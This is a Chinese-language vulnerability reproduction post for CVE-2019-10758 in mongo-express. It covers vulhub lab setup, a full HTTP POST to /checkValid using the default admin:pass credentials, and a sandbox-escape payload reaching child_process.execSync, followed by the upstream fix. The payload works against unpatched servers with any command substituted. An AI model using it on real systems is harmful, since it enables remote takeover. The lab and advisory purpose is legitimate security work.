网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

漏洞公告团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

CVE-2019-10758漏洞复现:MongoDB mongo-express远程代码执行漏洞

文章来源:重庆网站建设 发布时间:2020-08-04 13:42:35 围观次数:
分享到:

摘要:此软件包的受影响版本容易受到使用toBSON方法在端点上执行远程代码执行(RCE)攻击的攻击。在非安全环境中滥用vm依赖关系以执行exec命令。默认用户名为admin,密码为pass。

漏洞介绍:

  此软件包的受影响版本容易受到使用toBSON方法在端点上执行远程代码执行(RCE)攻击的攻击。在非安全环境中滥用vm依赖关系以执行exec命令。默认用户名为admin,密码为pass。


威胁类型

  远程执行代码。


威胁级别

  高。


漏洞编号

  CVE-2019-10758。


受影响的系统和应用程序版本

  mongo-express 0.54.0及更低版本。


不受影响的版本

  mongo-express 0.54.0或更高。


漏洞复现:

  构建一个vulhub环境。


vulhub下载

   git clone https://github.com.cnpmjs.org/vulhub/vulhub。

   git clone特别慢? 

  为了解决这个问题,总结了最有效的方法。

  当git clone时,将https://github.com替换为:https://github.com.cnpmjs.org/。

blob.png


安装docker

blob.png


安装docker-compose

  pip install docker-compose

blob.png

启用Docker,拉取映像,启动环境

blob.png

到目前为止,环境已成功构建!

  启动环境后,访问http://192.168.192.128:8081以查看网页。

blob.png

攻击复现:

  直接发送以下数据包执行代码

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124

 

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

blob.png

POC目标:在/ tcp下创建success文件

  发送数据包后访问http://localhost:8081

blob.png

检查创建是否成功:

  docker-compose exec web ls / tmp

blob.png

修复建议

   https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2

   在0.54.0中的bson.js中删除对vm的依赖,并改用mongo-query-parser

blob.png


本文由 重庆网站建设 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:CVE-2019-10758 漏洞 mongo-express 远程代码执行

上一篇:BootHole CVE-2020-10713漏洞:位于GRUB2引导程序中,几乎所有Linux和Windows设备都受到影响
下一篇:通过设置伪热点入侵iCloud帐户,攻击者可未经授权访问用户iCloud帐户。

热门资讯

鼠标向下滚动